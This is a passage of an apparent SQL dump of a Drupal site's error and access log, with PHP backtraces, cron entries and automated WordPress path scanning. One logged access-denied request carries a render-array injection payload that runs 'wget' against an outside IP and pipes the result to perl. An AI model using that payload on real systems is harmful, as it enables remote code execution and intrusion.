Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580290080),(4490,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:28:\"/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303696),(4491,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303696),(4492,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:6:\"7.03ms\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303696),(4493,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:6:\"4.07ms\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303696),(4494,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"3.96ms\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303696),(4495,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"31.79ms\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4496,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"2.37ms\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4497,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"3.61ms\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4498,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"1.05ms\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4499,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"14.86ms\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4500,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"15.75ms\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4501,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"60.44ms\";}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4502,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4503,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:15:\"/xmlrpc.php?rsd\";}',4,'','http://clidentcastelo.pt/xmlrpc.php?rsd','','158.69.38.243',1580303697),(4504,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:33:\"/blog/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/blog/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4505,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:32:\"/web/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/web/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4506,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:38:\"/wordpress/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/wordpress/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303697),(4507,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:36:\"/website/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/website/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303698),(4508,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:31:\"/wp/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/wp/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303698),(4509,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:33:\"/news/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/news/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303698),(4510,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:33:\"/2018/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/2018/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303698),(4511,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:33:\"/2019/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/2019/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303698),(4512,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:33:\"/shop/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/shop/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303699),(4513,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:32:\"/wp1/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/wp1/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303699),(4514,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:33:\"/test/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/test/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303699),(4515,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:34:\"/media/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/media/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303699),(4516,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:32:\"/wp2/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/wp2/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303699),(4517,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:33:\"/site/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/site/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303700),(4518,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:32:\"/cms/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/cms/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303700),(4519,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:33:\"/sito/wp-includes/wlwmanifest.xml\";}',4,'','http://clidentcastelo.pt/sito/wp-includes/wlwmanifest.xml','','158.69.38.243',1580303700),(4520,0,'access denied','@uri',_binary 'a:1:{s:4:\"@uri\";s:156:\"/user/register/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=wget+-qO+-+89.40.126.224%2Fbuh%7Cperl&name%5B%23type%5D=markup\";}',4,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580311777),(4521,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11368:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580311778),(4522,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11360:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 